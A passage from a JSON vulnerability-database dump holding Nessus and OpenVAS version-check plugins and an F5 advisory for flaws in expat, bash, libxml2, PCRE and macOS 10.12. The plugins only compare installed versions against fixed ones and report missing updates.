pkgver:\"4.3-7ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"bash\", pkgver:\"4.3-14ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"bash\", pkgver:\"4.3-15ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"bash\", pkgver:\"4.4-2ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:30:33", "bulletinFamily": "scanner", "description": "According to the version of the expat packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - An out-of-bounds read flaw was found in the way Expat processed certain input. A remote attacker could send specially crafted XML that, when parsed by an application using the Expat library, would cause that application to crash or, possibly, execute arbitrary code with the permission of the user running the application.(CVE-2016-0718)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-14T00:00:00", "id": "EULEROS_SA-2017-1002.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99849", "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP1 : expat (EulerOS-SA-2017-1002)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99849);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/14 14:36:22\");\n\n script_cve_id(\n \"CVE-2016-0718\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : expat (EulerOS-SA-2017-1002)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the expat packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - An out-of-bounds read flaw was found in the way Expat\n processed certain input. A remote attacker could send\n specially crafted XML that, when parsed by an\n application using the Expat library, would cause that\n application to crash or, possibly, execute arbitrary\n code with the permission of the user running the\n application.(CVE-2016-0718)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1002\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1767d439\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected expat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:expat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:expat-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"expat-2.1.0-10\",\n \"expat-devel-2.1.0-10\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"expat\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "f5": [{"lastseen": "2019-05-24T12:31:58", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned IDs 630446 and 674189 (BIG-IP) and ID 677266 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H52320548 on the **Diagnostics** &gt; **Identified** &gt; **High** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP AAM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP AFM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP Analytics | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP APM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP ASM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | ASM control plane, iControl SOAP, eventd \nBIG-IP DNS | 13.0.0 \n12.0.0 - 12.1.3 | 13.1.0 \n13.0.1 \n12.1.3.2 | High | big3d, gtmd, iControl SOAP, eventd \nBIG-IP Edge Gateway | 11.2.1 | None | High | iControl SOAP, eventd \nBIG-IP GTM | 11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 11.6.3.2 \n11.5.7 | High | big3d, gtmd, iControl SOAP, eventd \nBIG-IP Link Controller | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | big3d, gtmd, iControl SOAP, eventd \nBIG-IP PEM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP PSM | 11.4.1 | None | High | iControl SOAP, eventd \nBIG-IP WebAccelerator | 11.2.1 | None | High | iControl SOAP, eventd \nBIG-IP WebSafe | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | Medium | iControlPortal.cgi \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.3.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\niControl SOAP, eventd and BIG-IP ASM control plane\n\nTo mitigate this vulnerability for iControl SOAP, the **eventd** process, and the BIG-IP ASM control plane, permit management access to F5 products only over a secure network and restrict command line access for affected systems to trusted users. For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 13.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\nbig3d/gtmd\n\nTo mitigate this vulnerability for the **big3d**/**gtmd** process, limit connections to port 4353 to trusted hosts. For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 13.x)](<https://support.f5.com/csp/article/K13309>).\n\n**Note**: If you run **big3d_install** on BIG-IP versions prior to 11.5.0, it is possible that you may install a vulnerable version of **big3d** on systems that are running non-vulnerable versions of the BIG-IP system. In this case, upgrade to a fixed version or hotfix, and refer to [K13312: Overview of the BIG-IP DNS big3d_install, bigip_add, and gtm_add utilities (11.x - 13.x)](<https://support.f5.com/csp/article/K13312>) for information about running **big3d_install** to resolve the issue. \n\n**Note**: The iquery protocol used by the BIG-IP DNS system (formerly BIG-IP GTM) also uses port 4353. Ensure that all of the peer devices are included when you limit connections by IP address.\n\n * [K17329: BIG-IP GTM name has changed to BIG-IP DNS](<https://support.f5.com/csp/article/K17329>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n", "modified": "2018-07-24T04:32:00", "published": "2017-09-19T00:55:00", "id": "F5:K52320548", "href": "https://support.f5.com/csp/article/K52320548", "title": "Expat vulnerability CVE-2016-0718", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-03-19T12:28:52", "bulletinFamily": "scanner", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "modified": "2019-03-18T00:00:00", "published": "2017-07-20T00:00:00", "id": "OPENVAS:1361412562310811536", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811536", "title": "Apple Mac OS X Multiple Vulnerabilities-HT207922", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apple_macosx_mult_vuln_HT207922.nasl 14295 2019-03-18 20:16:46Z cfischer $\n#\n# Apple Mac OS X Multiple Vulnerabilities-HT207922\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811536\");\n script_version(\"$Revision: 14295 $\");\n script_cve_id(\"CVE-2017-7016\", \"CVE-2017-7033\", \"CVE-2017-7015\", \"CVE-2017-7050\",\n \"CVE-2017-7054\", \"CVE-2017-7062\", \"CVE-2017-7008\", \"CVE-2016-9586\",\n \"CVE-2016-9594\", \"CVE-2017-2629\", \"CVE-2017-7468\", \"CVE-2017-7014\",\n \"CVE-2017-7017\", \"CVE-2017-7035\", \"CVE-2017-7044\", \"CVE-2017-7036\",\n \"CVE-2017-7045\", \"CVE-2017-7025\", \"CVE-2017-7027\", \"CVE-2017-7069\",\n \"CVE-2017-7026\", \"CVE-2017-7068\", \"CVE-2017-9417\");\n script_bugtraq_id(99882, 99883, 99880, 95019, 95094, 96382, 97962, 99482);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 21:16:46 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-20 12:23:38 +0530 (Thu, 20 Jul 2017)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-HT207922\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A buffer overflow error.\n\n - Multiple input validation issues.\n\n - Multiple issues in curl.\n\n - An input validation issue.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to obtain sensitive information, gain extra privileges and execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X version 10.12.x before\n 10.12.6\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X version\n 10.12.6 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207922\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.12\");\n script_xref(name:\"URL\", value:\"https://www.apple.com\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer){\n exit(0);\n}\n\nif(\"Mac OS X\" >< osName && osVer =~ \"^10\\.12\")\n{\n if(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.5\"))\n {\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.12.6\");\n security_message(data:report);\n exit(0);\n }\n}\n\nexit(99);", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-14T14:20:56", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-05-18T00:00:00", "id": "OPENVAS:1361412562310843174", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843174", "title": "Ubuntu Update for bash USN-3294-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for bash USN-3294-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843174\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-18 06:50:06 +0200 (Thu, 18 May 2017)\");\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\", \"CVE-2016-9401\", \"CVE-2017-5932\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for bash USN-3294-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Bernd Dietzel discovered that Bash\n incorrectly expanded the hostname when displaying the prompt. If a remote\n attacker were able to modify a hostname, this flaw could be exploited to execute\n arbitrary code. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and\n Ubuntu 16.10. (CVE-2016-0634) It was discovered that Bash incorrectly handled\n the SHELLOPTS and PS4 environment variables. A local attacker could use this\n issue to execute arbitrary code with root privileges. This issue only affected\n Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-7543) It was\n discovered that Bash incorrectly handled the popd command. A remote attacker\n could possibly use this issue to bypass restricted shells. (CVE-2016-9401) It\n was discovered that Bash incorrectly handled path autocompletion. A local\n attacker could possibly use this issue to execute arbitrary code. This issue\n only affected Ubuntu 17.04. (CVE-2017-5932)\");\n script_tag(name:\"affected\", value:\"bash on Ubuntu 17.04,\n Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3294-1\");\n script_xref(name:\"URL\", value:\"https://www.ubuntu.com/usn/usn-3294-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.04|16\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.3-7ubuntu1.7\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.4-2ubuntu1.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.3-15ubuntu1.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.3-14ubuntu1.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-26T14:35:39", "bulletinFamily": "scanner", "description": "dict.c in libxml2 allows remote attackers to cause a denial of service (heap-based buffer over-read and application crash) via an unexpected character immediately after the ", "modified": "2018-10-26T00:00:00", "published": "2017-03-17T00:00:00", "id": "OPENVAS:1361412562310140193", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140193", "title": "F5 BIG-IP - libxml2 vulnerability CVE-2015-8806", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_f5_big_ip_K04450715.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# F5 BIG-IP - libxml2 vulnerability CVE-2015-8806\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140193\");\n script_cve_id(\"CVE-2015-8806\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"F5 BIG-IP - libxml2 vulnerability CVE-2015-8806\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K04450715\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n script_tag(name:\"summary\", value:\"dict.c in libxml2 allows remote attackers to cause a denial of service (heap-based buffer over-read and application crash) via an unexpected character immediately after the '<!DOCTYPE html' substring in a crafted HTML document.\");\n script_tag(name:\"impact\", value:\"This vulnerability allows disruption of service.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-17 10:24:10 +0100 (Fri, 17 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_require_ports(\"Services/ssh\", 22);\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) ) exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;');\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '12.1.2;');\n\nif( report = is_f5_vulnerable( ca:check_f5, version:version ) )\n{\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-26T14:35:30", "bulletinFamily": "scanner", "description": "Heap-based buffer overflow in the find_fixedlength function in pcre_compile.c in PCRE before 8.38 allows remote attackers to cause a denial of service (crash) or obtain sensitive information from heap memory and possibly bypass the ASLR protection mechanism via a crafted regular expression with an excess closing parenthesis.", "modified": "2018-10-26T00:00:00", "published": "2017-03-07T00:00:00", "id": "OPENVAS:1361412562310140179", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140179", "title": "F5 BIG-IP - PCRE library vulnerability CVE-2015-5073", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_f5_big_ip_K17331.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# F5 BIG-IP - PCRE library vulnerability CVE-2015-5073\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140179\");\n script_cve_id(\"CVE-2015-5073\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"F5 BIG-IP - PCRE library vulnerability CVE-2015-5073\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K17331\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a 